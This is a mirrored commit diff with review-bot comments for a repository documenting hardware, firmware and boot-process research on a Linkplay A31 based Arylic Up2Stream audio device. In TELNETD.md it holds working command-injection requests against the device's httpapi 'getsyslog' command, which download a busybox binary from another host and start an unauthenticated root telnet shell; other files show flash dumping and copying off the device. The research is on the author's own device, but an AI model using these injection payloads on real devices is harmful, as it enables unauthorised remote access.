mirror of
https://github.com/Jan21493/Linkplay.git
synced 2024-11-20 19:33:58 +00:00
This commit is contained in:
parent
34b9f14be7
commit
400bb3311d
3 changed files with 79 additions and 72 deletions
23
Hardware.md
|
@ -1,4 +1,4 @@
|
|||
# Hardware
|
||||
# Hardware and Firmware
|
||||
The specs for the Linkplay A31 module are as follows
|
||||
```
|
||||
# cat /proc/cpuinfo
|
||||
|
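Review bot: the heading rename to `# Hardware and Firmware` is the name that TELNETD.md and boot-process.md now point to in this same commit, so the three files stay consistent; any other document in the repository that still refers to a `Hardware` section would need the same update. The context line `The specs for the Linkplay A31 module are as follows` introduces a code block and should end with a colon.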
@ -29,7 +29,7 @@ https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/
|
|||
|
||||
The binaries are included in packages, so you have to find out which packages includes a specific binary. A list of packages can be found here: https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages
|
||||
|
||||
Here's an example how to download a package and get the binaries from it for a SSH server (dropbear):
|
||||
Here's an example how to download a package and get the binaries from it for a SSH server (dropbear). The commands were executed from a terminal window on my MacBook:
|
||||
|
||||
```
|
||||
cd ~/Downloads
|
||||
|
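Review bot: the two OpenWrt paths in this region disagree on the release: the hunk context reads `https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/` while the package index is `https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/Packages`; pick one release so the Packages index actually matches the .ipk files that the later examples download. Minor wording in the added sentence: `an example of how to download a package`, and the context line `which packages includes` should read `which package includes`.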
@ -137,4 +137,23 @@ wget -O /tmp/file -T 5 'http://10.1.1.22/a31/file';/bin/chmod 777 /tmp/file
|
|||
|
||||
# on Up2Stream device:
|
||||
wget -O /tmp/strings -T 5 'http://10.1.1.22/a31/strings';/bin/chmod 777 /tmp/strings
|
||||
```
|
||||
Here are some code snippets from a script on the device (can't remember any details). It looks that the commands for NTP are not working anymore, also the commands to switch power for the WiFi interface off:
|
||||
```
|
||||
srv=`nvram_get 2860 NTPServerIP`
|
||||
sync=`nvram_get 2860 NTPSync`
|
||||
tz=`nvram_get 2860 TZ`
|
||||
nvram_set 2860 TZ
|
||||
|
||||
nvram_set 2860 RadioOn 0
|
||||
nvram_set 2860 ApCliEnable 0
|
||||
--> blinking LED, but apcli0 and ra0 still enabled after reboot
|
||||
|
||||
nvram_set 2860 TxPower 0 or 1
|
||||
--> no effect
|
||||
```
|
||||
You can turn the WiFi interface and the internal access point off with the following commands:
|
||||
```
|
||||
ifconfig ra0 down
|
||||
ifconfig apcli0 down
|
||||
```
|
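Review bot: the new paragraph should say that `ifconfig ra0 down` and `ifconfig apcli0 down` take effect immediately but do not survive a reboot, which is the opposite trade-off from the `nvram_set` attempts it describes (`--> blinking LED, but apcli0 and ra0 still enabled after reboot`); without that caveat a reader may expect the interfaces to stay off. `nvram_set 2860 TxPower 0 or 1` is not a literal command and should be written as a `#` comment so the block is copy-safe. Wording: `It looks like the commands for NTP no longer work, and neither do the commands that switch the WiFi interface off`.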
19
TELNETD.md
|
@ -5,23 +5,20 @@ The command that has this vulnerability is **_"getsyslog"_**, see https://develo
|
|||
|
||||
The following code snippets are using the IP address 10.1.1.52 for my Arylic Up2Stream Pro v3 device and 10.1.1.22 for a web server running on my local MacBook.
|
||||
```
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash";
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash";
|
||||
```
|
||||
The command above is executing the following commands on the device:
|
||||
```
|
||||
wget -O /tmp/busybox -T 5 http://10.1.1.22/a31/busybox -q;
|
||||
/bin/chmod 777 /tmp/busybox;
|
||||
/tmp/busybox telnetd -l/bin/ash
|
||||
wget -O /tmp/bin/busybox -T 5 http://10.1.1.22/a31/busybox -q;
|
||||
chmod 777 /tmp/bin/busybox;
|
||||
/tmp/bin/busybox telnetd -l/bin/ash
|
||||
```
|
||||
The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere. A version of busybox is provided here:
|
||||
|
||||
There is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need:
|
||||
https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/
|
||||
|
||||
The binaries are included in packages
|
||||
The tool **_"busybox"_** is like a swiss army knife and combines a lot of CLI commands in a single binary file. That file was stripped down already in my version and does not include a telnetd anymore. Therefore you have to get a full version from somewhere.
|
||||
|
||||
A version of busybox is provided here, but there is an OpenWRT archive where you can get precompiled binaries for almost all utilities you may need. See section **_Hardware and Firmware_** for more information.
|
||||
|
||||
You may also redirect output and error output for telnetd:
|
||||
```
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;/bin/chmod+777+/tmp/busybox;/tmp/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;";
|
||||
curl "http://10.1.1.52httpapi.asp?command=getsyslog:ip:10.1.1.22/index.html;wget+-O+/tmp/bin/busybox+-T+5+http://10.1.1.22/a31/busybox+-q;chmod+777+/tmp/bin/busybox;/tmp/bin/busybox+telnetd+-l/bin/ash+>+/tmp/web/cmd.out+2>+/tmp/web/cmd.err;";
|
||||
```
|
||||
|
||||
|
|
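Review bot: the updated commands now write to `/tmp/bin/busybox`, but nothing in TELNETD.md creates `/tmp/bin`; the `mkdir /tmp/bin` step only appears in boot-process.md, so either add that step here or point the reader to it, otherwise the documented sequence does not match what the device has. The sentence `A version of busybox is provided here` no longer has a link or path after this rewrite, so state where in the repository the binary lives or drop the clause. Style: `chmod 755` is enough for an executable; `777` leaves a world-writable binary in /tmp, which is a needless exposure even on a lab device.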
109
boot-process.md
|
@ -50,29 +50,41 @@ https://archive.openwrt.org/chaos_calmer/15.05/ramips/mt7628/packages/base/
|
|||
and
|
||||
https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/
|
||||
|
||||
|
||||
Example to download the tools from the OpenWRT version Chaos Calmer:
|
||||
-----------------------------------------------
|
||||
uboot-envtools_2014.10-2_ramips_24kec.ipk
|
||||
|
||||
Here's an example how to download a package from the Open WRT archive and get the binaries from it to show the environment. The commands were executed from a terminal window on my MacBook:
|
||||
```
|
||||
cd ~/Downloads
|
||||
curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/uboot-envtools_2014.10-2_ramips_24kec.ipk' -o uboot-envtools_2014.10-2_ramips_24kec.ipk
|
||||
mkdir uboot-envtools_2014.10-2_ramips_24kec
|
||||
cd uboot-envtools_2014.10-2_ramips_24kec
|
||||
tar zxpvf ../uboot-envtools_2014.10-2_ramips_24kec.ipk
|
||||
tar zxpvf control.tar.gz
|
||||
tar zxpvf data.tar.gz
|
||||
|
||||
wget -O /tmp/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv';/bin/chmod 777 /tmp/fw_printenv
|
||||
ln -s /tmp/fw_printenv /tmp/fw_setenv
|
||||
|
||||
# copy dropbear binary to a subdirectory on your webserver
|
||||
cp usr/sbin/fw_printenv /Library/WebServer/Documents/a31/
|
||||
# you may open finder to search for additional information in the package
|
||||
open .
|
||||
```
|
||||
In the next step you can you can download and install the tool on the Up2Stream device (telnetd already installed):
|
||||
```
|
||||
cd /tmp
|
||||
mkdir /tmp/bin
|
||||
wget -O /tmp/bin/fw_printenv -T 5 'http://10.1.1.22/a31/fw_printenv'
|
||||
chmod 777 /tmp/bin/fw_printenv
|
||||
ln -s /tmp/bin/fw_printenv /tmp/bin/fw_setenv
|
||||
```
|
||||
and the same for dmesg:
|
||||
```
|
||||
cd ~/Downloads
|
||||
curl 'https://archive.openwrt.org/chaos_calmer/15.05.1/ramips/mt7628/packages/base/dmesg_2.25.2-4_ramips_24kec.ipk' -o dmesg_2.25.2-4_ramips_24kec.ipk
|
||||
mkdir dmesg_2.25.2-4_ramips_24kec
|
||||
cd dmesg_2.25.2-4_ramips_24kec
|
||||
tar zxpvf ../dmesg_2.25.2-4_ramips_24kec.ipk
|
||||
tar zxpvf control.tar.gz
|
||||
tar zxpvf data.tar.gz
|
||||
open .
|
||||
# copy ./usr/sbin/dmesg to your webserver, e.g. /Library/WebServer/Documents/a31
|
||||
on Up2Stream device:
|
||||
cp ./usr/sbin/dmesg /Library/WebServer/Documents/a31
|
||||
```
|
||||
Installit on the Up2Stream device and dig for some useful information:
|
||||
```
|
||||
wget -O /tmp/dmesg -T 5 'http://10.1.1.22/a31/dmesg';/bin/chmod 777 /tmp/dmesg
|
||||
|
||||
cat /proc/version
|
||||
|
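Review bot: two labels in the new blocks are wrong: the comment `# copy dropbear binary to a subdirectory on your webserver` sits above `cp usr/sbin/fw_printenv /Library/WebServer/Documents/a31/`, so it was carried over from the dropbear example and should name fw_printenv; and in the dmesg block the line `on Up2Stream device:` is followed by `cp ./usr/sbin/dmesg /Library/WebServer/Documents/a31`, which is a MacBook-side copy, not a device command, so that label belongs above the wget in the following block. The dmesg install still targets `/tmp/dmesg` while fw_printenv now lives in `/tmp/bin`; `/tmp/bin/dmesg` would keep the layout consistent. Typos: `you can you can` and `Installit`.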
@ -127,41 +139,37 @@ mtd9: 00200000 00010000 "user2"
|
|||
[ 0.700000] 0x000000d80000-0x000000e00000 : "user"
|
||||
[ 0.712000] 0x000000e00000-0x000001000000 : "user2"
|
||||
...
|
||||
```
|
||||
Install **_dd_** from busybox and **_scp_** from dropbear package (see **_Enable Telnet_** section to install **_busybox_** and **_Hardware and Firmware_** section to install **dropbear**), then
|
||||
```
|
||||
# tools included in busybox just need a symbolic link with their name
|
||||
ln -s /tmp/bin/busybox /tmp/bin/dd
|
||||
## copy mtd1 to a file and save for future use
|
||||
dd if=/dev/mtd1 of=/tmp/mtd1.img bs=512 count=128000 skip=0
|
||||
scp -v -S /tmp/bin/dbclient /tmp/mtd1.img pi@10.1.1.40:mtd1.img
|
||||
rm /tmp/mtd1.img
|
||||
```
|
||||
--> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied. See **_cat /proc/mtd_** from above for details.
|
||||
|
||||
install dd from busybox and scp from dropbear package, then
|
||||
|
||||
dd if=/dev/mtd1 of=/tmp/mtd1.cp bs=512 count=128000 skip=0
|
||||
scp -v -S /tmp/bin/dbclient /tmp/mtd1.cp pi@10.1.1.40:mtd1.cp
|
||||
rm /tmp/mtd1.cp
|
||||
|
||||
--> size 0x30000 = 196608 bytes. The command above tries to copy more data, so the whole mtd1 partition is copied.
|
||||
|
||||
mtd1: 00030000 00010000 "Bootloader" - no environment variables
|
||||
mtd2: 00010000 00010000 "Config" - from 0x2000 to 0x6000
|
||||
mtd3: 00010000 00010000 "Factory"
|
||||
mtd4: 00200000 00010000 "bkKernel"
|
||||
mtd5: 001df508 00010000 "Kernel"
|
||||
mtd6: 00950af8 00010000 "RootFS"
|
||||
mtd7: 00b30000 00010000 "Kernel_RootFS"
|
||||
mtd8: 00080000 00010000 "user"
|
||||
mtd9: 00200000 00010000 "user2"
|
||||
|
||||
mkdir /var/lock
|
||||
|
||||
create file /etc/fw_env.config
|
||||
with
|
||||
Create the file **_/etc/fw_env.config_** with the following content, e.g. with vi:
|
||||
```
|
||||
cat <<\EOF > /etc/fw_env.config
|
||||
# MTD device name Device offset Env. size Flash sector size
|
||||
/dev/mtd2 0x02000 0x4000 0x4000
|
||||
|
||||
before setting the correct values:
|
||||
/tmp/fw_printenv
|
||||
EOF
|
||||
mkdir /var/lock
|
||||
```
|
||||
Before setting the correct values for the size the following error is shown:
|
||||
```
|
||||
fw_printenv
|
||||
Warning: Bad CRC, using default environment
|
||||
bootcmd=bootp; setenv bootargs root=/dev/nfs nfsroot=${serverip}:${rootpath} ip=${ipaddr}:${serverip}:${gatewayip}:${netmask}:${hostname}::off; bootm
|
||||
bootdelay=5
|
||||
baudrate=115200
|
||||
|
||||
with settings from above:
|
||||
# fw_printenv
|
||||
```
|
||||
With the correct settings from above you get a list with all environment variables. These values are stored in NVRAM, so they will survive a reboot:
|
||||
```
|
||||
fw_printenv
|
||||
WebInit=1
|
||||
HostName=wiimu
|
||||
OperationMode=3
|
||||
|
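Review bot: the `fw_env.config` line `/dev/mtd2 0x02000 0x4000 0x4000` gives a flash sector size of 0x4000, but the `/proc/mtd` listing in this file shows `mtd2: 00010000 00010000 "Config"`, whose third field is the erase size 0x10000; fw_printenv reads with either value, but fw_setenv erases and rewrites whole sectors, so a sector size that does not match the erase block can make writes fail. Please verify the value before the `ln -s /tmp/bin/fw_printenv /tmp/bin/fw_setenv` symlink is presented as usable. Two smaller points: `dd ... bs=512 count=384` would copy exactly the 0x30000 bytes the note below mentions instead of relying on dd stopping at the end of the device, and the comment `## copy mtd1 to a file and save for future use` uses a double `#` while the comment above it uses a single one.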
@ -369,26 +377,9 @@ ApCliAuthMode=WPA2PSK
|
|||
ApCliEncrypType=AES
|
||||
ApCliChannel=6
|
||||
|
||||
# show contents of NVRAM
|
||||
# a similar output will provide
|
||||
ralink_init show 2860
|
||||
|
||||
--> similar output
|
||||
|
||||
code snippet from a script:
|
||||
srv=`nvram_get 2860 NTPServerIP`
|
||||
sync=`nvram_get 2860 NTPSync`
|
||||
tz=`nvram_get 2860 TZ`
|
||||
nvram_set 2860 TZ
|
||||
```
|
||||
|
||||
|
||||
nvram_set 2860 RadioOn 0
|
||||
nvram_set 2860 ApCliEnable 0
|
||||
|
||||
--> blinking LED, but apcli0 and ra0 still enabled after reboot
|
||||
|
||||
nvram_set 2860 TxPower 0 or 1
|
||||
|
||||
--> no effect
|
||||
|
||||
The environment is usually at the end of the uboot partition.
|
||||
|
||||
|
|
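Review bot: the closing sentence `The environment is usually at the end of the uboot partition.` contradicts this file's own setup, where fw_env.config points at `/dev/mtd2` (Config) at offset 0x2000 rather than the Bootloader partition; qualify it with the device-specific location so a reader does not go looking in mtd1. The comment `# a similar output will provide` above `ralink_init show 2860` reads awkwardly; `# ralink_init shows similar output:` is clearer.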